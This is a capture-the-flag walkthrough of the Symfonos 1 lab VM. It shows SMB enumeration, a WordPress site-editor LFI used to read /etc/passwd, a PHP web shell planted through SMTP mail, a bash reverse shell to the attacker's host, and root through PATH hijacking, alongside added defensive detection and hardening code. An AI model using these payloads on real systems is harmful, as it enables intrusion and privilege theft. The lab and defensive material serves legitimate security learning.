Symfonos 1

Walkthrough of the Symfonos 1 machine from Vulnhub

Symfonos 1

Link to VulnHub

Getting the target machine's IP address

The first thing we are going to do is find out the IP address of the target machine. To do this we use nmap with a ping scan (-sn) of the network we are currently connected to. If we are not logged in as root it is recommended to run it with sudo, since nmap can then use ARP requests and also report the MAC address and vendor of each host on the network:

nmap -sn 192.168.56.1/24

Result:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 10:10 CEST
Nmap scan report for 192.168.56.1
Host is up (0.00036s latency).
Nmap scan report for 192.168.56.13
Host is up (0.000056s latency).
Nmap scan report for 192.168.56.14
Host is up (0.00041s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.44 seconds

Nmap indicates that the IP of the target machine is the following (the first address is the host side of the virtual network and the second is the IP of the attacking machine):

  • 192.168.56.14

If the target is a virtual machine we can verify this by checking that the MAC address reported by nmap matches the one of the VM's network adapter.

The next thing we are going to do is to add the IP of the target machine to our /etc/hosts. This way we won't need to remember the IP and we can use whatever name we give it. We edit the /etc/hosts file and add the following line at the end of it:

192.168.56.14 symfonos1.ctf

Now if we run ping symfonos1.ctf -c 1 we should get the following response:

PING symfonos1.ctf (192.168.56.14) 56(84) bytes of data.
64 bytes from symfonos1.ctf (192.168.56.14): icmp_seq=1 ttl=64 time=0.703 ms

--- symfonos1.ctf ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.703/0.703/0.703/0.000 ms

This confirms that it correctly resolves the hostname we have assigned to it.

Port scanning

Once we have the IP of the target machine, the next step is to detect the open ports. To do this we run another nmap scan against the entire port range (-p-) using the fastest timing template (-T5), showing only open ports (--open), and disabling DNS resolution (-n) and host discovery (-Pn):

nmap -p- -T5 --open -Pn -n symfonos1.ctf

Result:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 10:14 CEST
Nmap scan report for symfonos1.ctf (192.168.56.14)
Host is up (0.00021s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 2.08 seconds

From this scan we learn that the following ports are open: 22 (SSH), 25 (SMTP), 80 (HTTP), 139 (NETBIOS-SSN) and 445 (MICROSOFT-DS). Knowing which ports are open, the next thing we do is detect which services are exposed on them and their versions, running the default scripts together with version detection (-sCV):

nmap -p 22,25,80,139,445 -sCV symfonos1.ctf

Result:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 10:16 CEST
Nmap scan report for symfonos1.ctf (192.168.56.14)
Host is up (0.00041s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 ab5b45a70547a50445ca6f18bd1803c2 (RSA)
|   256 a05f400a0a1f68353ef45407619fc64a (ECDSA)
|_  256 bc31f540bc08584bfb6617ff8412ac1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_clock-skew: mean: 3h39m58s, deviation: 2h53m12s, median: 1h59m58s
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2023-04-16T10:17:09
|_  start_date: N/A
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2023-04-16T05:17:09-05:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds

From the result of the more detailed scan we obtain the following:

  • 22/tcp: SSH - OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
  • 25/tcp: SMTP - Postfix smtpd
  • 80/tcp: HTTP - Apache httpd 2.4.25 ((Debian))
  • 139/tcp: NETBIOS-SSN - Samba smbd 3.X - 4.X
  • 445/tcp: NETBIOS-SSN - Samba smbd 4.5.16-Debian
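Reading a long -sCV report by eye is error-prone, so below is a small parser that turns nmap's normal output into per-port records and then flags the configuration weaknesses a defender would want to fix on this host (SMB signing disabled or not required, guest sessions accepted, VRFY enabled on SMTP). It is an added example written for this walkthrough, not part of the original write-up or of nmap; the sample report is a constructed, abridged copy of the scan above.

```python
import re

# Constructed, abridged nmap -sCV report in the same format as the full one
# above; the values are copied from this walkthrough's scan, not a new scan.
SAMPLE_REPORT = """\
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|_  256 bc31f540bc08584bfb6617ff8412ac1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux

Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

# "445/tcp open  netbios-ssn Samba smbd ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_report(text):
    """Split a normal-format nmap report into per-port records and host-level script lines.

    NSE script lines (those starting with '|') are attached to the port that
    precedes them, until the 'Host script results' section starts.
    """
    ports, host_scripts = [], []
    in_host_section = False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                          "service": m.group(4), "version": m.group(5).strip(), "scripts": []})
            continue
        if line.startswith("Host script results"):
            in_host_section = True
            continue
        if line.startswith("|"):
            entry = line.lstrip("|_ ").strip()   # drop nmap's tree-drawing prefix
            if in_host_section:
                host_scripts.append(entry)
            elif ports:
                ports[-1]["scripts"].append(entry)
    return ports, host_scripts


def review(text):
    """Return the findings a defender would raise from the parsed report."""
    ports, host_scripts = parse_report(text)
    findings = []
    for p in ports:
        if p["service"] == "smtp" and any(s.startswith("smtp-commands") and "VRFY" in s
                                          for s in p["scripts"]):
            findings.append(f"{p['port']}/smtp: VRFY enabled, lets anyone confirm local usernames")
    for s in host_scripts:
        if s.startswith("message_signing: disabled"):
            findings.append("445/smb: SMB1 message signing disabled")
        elif s == "Message signing enabled but not required":
            findings.append("445/smb: SMB2 message signing not required")
        elif s == "account_used: guest":
            findings.append("445/smb: guest session accepted by the host")
    return findings


if __name__ == "__main__":
    for f in review(SAMPLE_REPORT):
        print(f)
```

On the full report from this scan the same function also picks up the guest session that the smbclient step below relies on, which is the setting an administrator would turn off first (map to guest = never in smb.conf, and server signing = mandatory).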

SAMBA service enumeration (445/SMB)

In the port scan we saw that SMB, the file sharing service, is exposed. Often no authentication is needed to access the shared files, so we use smbclient to list (-L) the shares:

smbclient -L //symfonos1.ctf

Result (pressing enter without entering a password):

Password for [WORKGROUP\parrot]:

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	helios          Disk      Helios personal share
	anonymous       Disk
	IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available

The result shows two shares that may be interesting, helios and anonymous. Next we try to connect to them as guest (-U guest):

smbclient //symfonos1.ctf/anonymous -U guest

Result (pressing enter without entering a password):

Try "help" to get a list of possible commands. smb: \>

Now that we are connected we list the content with the ls command:

smb: \> ls
  .                                   D        0  Sat Jun 29 03:14:49 2019
  ..                                  D        0  Sat Jun 29 03:12:15 2019
  attention.txt                       N      154  Sat Jun 29 03:14:49 2019

		19994224 blocks of size 1024. 17305692 blocks available

There is a file called attention.txt. We download it to our machine with get attention.txt and read its content:

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! Next person I find using one of these passwords will be fired! -Zeus

The file tells us that several system users use the common passwords epidioko, qwerty and baseball.

Now that we have some passwords we try to obtain possible usernames so we can log in and access their resources. To do this we use rpcclient with a null session, i.e. the anonymous user (-U ""):

rpcclient -U "" symfonos1.ctf

Once we are connected we use the enumdomusers command:

rpcclient $> enumdomusers
user:[helios] rid:[0x3e8]

This tells us that there is a system user named helios, which matches the name of one of the shares listed with smbclient. We try to log in to that share with each of the passwords obtained earlier:

smbclient //symfonos1.ctf/helios -U helios

Result (using the password qwerty):

Try "help" to get a list of possible commands. smb: \>

Now that we are logged in we list the available files with the ls command:

smb: \> ls
  .                                   D        0  Sat Jun 29 02:32:05 2019
  ..                                  D        0  Sat Jun 29 02:37:04 2019
  research.txt                        A      432  Sat Jun 29 02:32:05 2019
  todo.txt                            A       52  Sat Jun 29 02:32:05 2019

		19994224 blocks of size 1024. 17305680 blocks available

The share contains two files, research.txt and todo.txt, so, as before, we download them with get <filename>:

Contents of research.txt:

Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.

Contents of todo.txt:

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

From the two files the only clue that looks interesting, at least a priori, is that the web application has a path /h3l105.

HTTP service analysis (80/TCP)

If we open http://symfonos1.ctf/ in the browser we find only an image. Inspecting the page source shows nothing else either, so let's look at the other path we found earlier.

At http://symfonos1.ctf/h3l105/ we find a site built with WordPress. To look for vulnerabilities in a WordPress site there is a tool called WPScan. We run it enumerating all plugins (--enumerate ap) with aggressive plugin and version detection:

wpscan --url http://symfonos1.ctf/h3l105/ --enumerate ap --plugins-detection aggressive --plugins-version-detection aggressive

Relevant result:

...
Interesting Finding(s):
...
[+] Upload directory has listing enabled: http://symfonos1.ctf/h3l105/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
...
[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:59 <========================================================================================================> (102916 / 102916) 100.00% Time: 00:00:59
[+] Checking Plugin Versions (via Aggressive Methods)

[i] Plugin(s) Identified:
...
[+] site-editor
 | Location: http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 | Readme: http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/, status: 200
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/readme.txt
...

On the one hand, directory listing is enabled in /h3l105/wp-content/uploads/. That directory contains a folder siteeditor which, together with the rest of the WPScan output, confirms that the site-editor plugin version 1.1.1 is installed. Searching Exploit Database we find that this version has a local file inclusion (LFI) vulnerability (CVE-2018-7422).

The advisory tells us that system files can be read through the URL http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=<file>, so we try the following URL in the browser:

http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Result:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:111::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
helios:x:1000:1000:,,,:/home/helios:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:115::/var/spool/postfix:/bin/false
{"success":true,"data":{"output":[]}}

This confirms the LFI, and since the included file is parsed by PHP, if we can find a way to write PHP code somewhere on the system and include it through the LFI we can turn it into remote command execution (RCE).
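The root cause of CVE-2018-7422 is that a request parameter is used directly as the path of a PHP include. The block below models that pattern and its fix in Python so it can be run without a WordPress install: a containment check (relative path only, normalised, kept inside the plugin's include root, .php only) next to the stronger option of mapping a request key to a developer-registered file. This is an added example for this walkthrough, not the plugin's code or its vendor patch; the on-disk layout in PLUGIN_DIR and the KNOWN_INCLUDES key are assumptions.

```python
import posixpath

# Assumed on-disk layout of the WordPress install from this walkthrough; the
# real paths on the machine are not shown in the write-up.
PLUGIN_DIR = "/var/www/html/h3l105/wp-content/plugins/site-editor"
INCLUDE_ROOT = PLUGIN_DIR + "/editor"

# Strongest fix: the request names a key, the server decides the file.
# The key name is hypothetical; the file is the one named in the walkthrough.
KNOWN_INCLUDES = {
    "shortcode_pattern": "extensions/pagebuilder/includes/ajax_shortcode_pattern.php",
}


def vulnerable_resolve(ajax_path):
    """The CVE-2018-7422 pattern: the request parameter becomes the include path unchanged,
    so /etc/passwd or a mail spool is as valid as a plugin file."""
    return ajax_path


def hardened_resolve(ajax_path):
    """Containment check for a path-style parameter; returns the resolved path or None.

    posixpath.normpath is used so the example runs without the files existing;
    on a live server, also apply realpath() to the result so symlinks cannot
    point back outside INCLUDE_ROOT.
    """
    if not ajax_path or "\0" in ajax_path or ajax_path.startswith("/"):
        return None                      # empty, NUL-truncated or absolute
    if "://" in ajax_path:
        return None                      # URL-style paths are never plugin files
    candidate = posixpath.normpath(posixpath.join(INCLUDE_ROOT, ajax_path))
    if not candidate.startswith(INCLUDE_ROOT + "/"):
        return None                      # '..' segments escaped the include root
    if not candidate.endswith(".php"):
        return None                      # only code files are meant to be included
    return candidate


def resolve_by_key(key):
    """Allow-list lookup: only files the developer registered can ever be included."""
    rel = KNOWN_INCLUDES.get(key)
    return None if rel is None else INCLUDE_ROOT + "/" + rel


if __name__ == "__main__":
    for p in ("/etc/passwd", "../../../../../../var/mail/helios",
              "extensions/pagebuilder/includes/ajax_shortcode_pattern.php"):
        print(f"{p!r:60} vulnerable={vulnerable_resolve(p)!r} hardened={hardened_resolve(p)!r}")
```

The containment check is the minimum that makes the two requests used in this walkthrough fail; the key lookup is preferable because it removes the filesystem path from the request entirely, so there is nothing left to normalise.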

Gaining access to the target machine

Recalling the exposed services, one of them was SMTP. If we open http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios in the browser we confirm that we can read helios' mailbox through the LFI, so if we manage to deliver a message containing our PHP shell into that file we will get RCE.

We connect with Telnet to port 25 of the target and send a message whose subject is <?php system($_GET['c']); ?>:

telnet symfonos1.ctf 25
Trying 192.168.56.14...
Connected to symfonos1.ctf.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
mail from: test@test.test
250 2.1.0 Ok
rcpt to: helios@symfonos.localdomain
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: <?php system($_GET['c']); ?>
.
250 2.0.0 Ok: queued as BE46640B98
quit
221 2.0.0 Bye
Connection closed by foreign host.

Once the PHP shell is in the mailbox, we pass the command to execute by adding &c=id to the URL. Opening http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&c=id in the browser gives:

...
From test@test.test Sun Apr 16 07:42:30 2023
Return-Path: <test@test.test>
X-Original-To: helios@symfonos.localdomain
Delivered-To: helios@symfonos.localdomain
Received: from unknown (unknown [192.168.56.13])
        by symfonos.localdomain (Postfix) with SMTP id BE46640B98
        for <helios@symfonos.localdomain>; Sun, 16 Apr 2023 07:40:52 -0500 (CDT)
subject: uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
{"success":true,"data":{"output":[]}}

As we can see, the id command was executed on the target machine and its output is shown in place of the subject. Next we set up a reverse shell so we can work more comfortably.
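Both halves of this attack leave traces: the include requests appear in the Apache access log, and the planted PHP tag sits in the mailbox. The detection below, added here and not part of the original write-up, runs over constructed log and spool lines modelled on the requests above and flags an include parameter that leaves the plugin directory, a command parameter supplied next to it, and mail headers that contain a PHP open tag. The access-log format is Apache's common log format; the sample lines are constructed, not captured from the machine.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache access-log lines modelled on the requests made in this
# walkthrough; not captured from the Symfonos machine.
ACCESS_LOG = """\
192.168.56.13 - - [16/Apr/2023:07:39:10 -0500] "GET /h3l105/ HTTP/1.1" 200 5123
192.168.56.13 - - [16/Apr/2023:07:40:02 -0500] "GET /h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 200 2341
192.168.56.13 - - [16/Apr/2023:07:42:30 -0500] "GET /h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&c=id HTTP/1.1" 200 812
192.168.56.13 - - [16/Apr/2023:07:43:00 -0500] "GET /h3l105/wp-content/uploads/ HTTP/1.1" 200 301
"""

# Constructed mbox excerpt: the first message carries a PHP open tag in a
# header, as the SMTP step of this walkthrough plants one; the second is benign.
MAIL_SPOOL = """\
From test@test.test Sun Apr 16 07:42:30 2023
Return-Path: <test@test.test>
Delivered-To: helios@symfonos.localdomain
subject: <?php system($_GET['c']); ?>

From alice@example.test Sun Apr 16 08:00:00 2023
Subject: lunch?
"""

# client - - [time] "METHOD target protocol" status ...
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
PHP_TAG_RE = re.compile(r"<\?(php\b|=)", re.IGNORECASE)
# Request parameters the site-editor plugin hands to a file include (CVE-2018-7422)
INCLUDE_PARAMS = ("ajax_path",)


def check_request(line):
    """Return a finding dict if this access-log line looks like a file-include attempt, else None."""
    m = REQ_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status = m.groups()
    url = urlsplit(target)
    query = parse_qs(url.query)          # values are already percent-decoded here
    reasons = []
    for name in INCLUDE_PARAMS:
        for value in query.get(name, []):
            # A legitimate include is a relative path inside the plugin directory
            if value.startswith("/") or ".." in value.split("/"):
                reasons.append(f"{name} leaves the plugin directory: {value}")
    if reasons and "c" in query:
        reasons.append("extra parameter c supplied alongside the include (command execution pattern)")
    if not reasons:
        return None
    return {"src": src, "time": ts, "status": status, "path": url.path, "reasons": reasons}


def scan_access_log(text):
    """All findings for a block of access-log text, in log order."""
    return [f for f in (check_request(line) for line in text.splitlines()) if f]


def scan_mail_spool(text):
    """1-based line numbers of spool lines that contain a PHP open tag."""
    return [i for i, line in enumerate(text.splitlines(), 1) if PHP_TAG_RE.search(line)]


if __name__ == "__main__":
    for f in scan_access_log(ACCESS_LOG):
        print(f["time"], f["src"], f["path"], "|", "; ".join(f["reasons"]))
    print("PHP tag in mail spool at lines:", scan_mail_spool(MAIL_SPOOL))
```

The second finding, an out-of-tree include paired with a command parameter from the same client, is the one worth paging on; on its own, the spool check is also a cheap postfix-side control, since a header containing <?php has no business being delivered to a mailbox that the web server can read.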

To do this, we start a listener on our machine with Netcat:

nc -nlvp 8888

Netcat confirms that it is listening:

listening on [any] 8888 ...

Then, through the web shell we have placed on the server, we execute a command that connects back to our Netcat listener (/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.13/8888 0>&1'). Since the character '&' would be interpreted as a query-string separator, we URL-encode it as %26 and pass the command through the c parameter: http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&c=/bin/bash -c 'bash -i >%26 /dev/tcp/192.168.56.13/8888 0>%261'. On the listener we get:

connect to [192.168.56.13] from (UNKNOWN) [192.168.56.14] 39122
bash: cannot set terminal process group (492): Inappropriate ioctl for device
bash: no job control in this shell
<ite-editor/editor/extensions/pagebuilder/includes$

Now, to get a fully interactive shell, we spawn a pseudo-terminal with script /dev/null -c bash, press Ctrl + Z and fix the tty with stty raw -echo; fg. We then run reset, answer xterm when asked for the terminal type, and export two environment variables:

  • export TERM=xterm
  • export SHELL=bash

With this we can use Ctrl + C to interrupt a command, Ctrl + L to clear the terminal, and browse the command history.

Privilege escalation

Checking our sudo permissions with sudo -l shows that we have none, so we look for executables with the SUID bit set. To find them we use the find command:

find / -perm -4000 2>/dev/null

Result:

/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping

Among the binaries one catches our attention, /opt/statuscheck, because it is not a standard system binary. If we run it, it returns what looks like the HTTP response headers from a curl request:

HTTP/1.1 200 OK
Date: Sun, 16 Apr 2023 13:11:32 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html

If we look at the printable strings in the binary with strings /opt/statuscheck we see that it runs the command curl -I http://localhost (the string is split across lines by the compiler's padding bytes):

/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
AWAVA
AUATL
...

This confirms that it calls curl through system() (the imported symbol is visible in the output) without the full path to the binary, so it may be vulnerable to PATH hijacking. To check, we create the file /tmp/curl with the following content:

chmod u+s /bin/bash

When statuscheck runs our fake curl, that script sets the SUID bit on the /bin/bash binary. After creating the file we make it executable with chmod +x /tmp/curl and modify PATH so that the fake curl in /tmp is found before the real one. To achieve this we execute:

export PATH=/tmp:$PATH

If we now check the path with echo $PATH we see that /tmp is the first entry. Running /opt/statuscheck now produces no output and, if we check the system bash with ls -l /bin/bash, we see the following:

-rwsr-xr-x 1 root root 1099016 May 15 2017 /bin/bash

The permissions have changed, so we can now run bash keeping the effective privileges (-p) as follows:

bash -p

Result:

bash-4.4# id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

With this we have an effective uid of root and can access all the files on the system.
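The escalation works only because statuscheck lets the caller's PATH decide which curl runs. The block below, an added example for this walkthrough rather than anything from the machine, shows the mechanism and the fix in one place: first_on_path resolves a bare command name the way system(3) does, demo_path_hijack shows that resolution flipping to a placeholder file once a caller-writable directory is prepended (nothing is executed, and the placeholder only echoes text), writable_path_dirs is the audit check for that exposure, and hardened_statuscheck returns the argv and environment a SUID helper should use instead. The curl location in CURL is an assumption.

```python
import os
import stat
import tempfile


def first_on_path(cmd, path):
    """Resolve a bare command name as a shell (and system(3)) would: first executable along PATH."""
    for d in path.split(":"):
        if not d:
            continue
        candidate = os.path.join(d, cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def writable_path_dirs(path):
    """PATH entries the current user can write to; a bare command lookup that
    walks through one of these before the real binary's directory is hijackable."""
    return [d for d in path.split(":") if d and os.path.isdir(d) and os.access(d, os.W_OK)]


# Assumed install location of curl; the walkthrough does not state it.
CURL = "/usr/bin/curl"
# Fixed environment a privileged helper should run children with, never the caller's.
CLEAN_ENV = {"PATH": "/usr/sbin:/usr/bin:/sbin:/bin"}


def hardened_statuscheck():
    """What /opt/statuscheck should have done: absolute binary, argv list (no shell
    parsing), fixed environment. Returns (argv, env) to hand to subprocess.run or
    execve; the example does not run it."""
    return [CURL, "-I", "http://localhost"], CLEAN_ENV


def demo_path_hijack():
    """Resolve 'curl' before and after a caller-writable directory is prepended to PATH.
    A harmless placeholder file stands in for the fake curl; nothing is executed."""
    base = "/usr/bin:/bin"
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, "curl")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho placeholder\n")
        os.chmod(fake, stat.S_IRWXU)     # must be executable to win the lookup
        hijacked = tmp + ":" + base
        return {
            "tmp": tmp,
            "before": first_on_path("curl", base),       # the real curl, or None if absent
            "after": first_on_path("curl", hijacked),    # the placeholder in tmp
            "hijackable": writable_path_dirs(hijacked),  # tmp is reported as writable
        }


if __name__ == "__main__":
    r = demo_path_hijack()
    print("curl resolves to", r["before"], "-> after prepending", r["tmp"], ":", r["after"])
    print("writable PATH entries:", r["hijackable"])
    print("hardened invocation:", hardened_statuscheck())
```

The two defensive takeaways match what the strings output revealed: a SUID program must not rely on system() with a relative command name, and it must not inherit PATH from its caller; glibc already ignores LD_PRELOAD for set-uid binaries, but it does nothing about PATH.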

Once we are root we can read the flag (/root/proof.txt): Congrats on rooting symphones:1! ....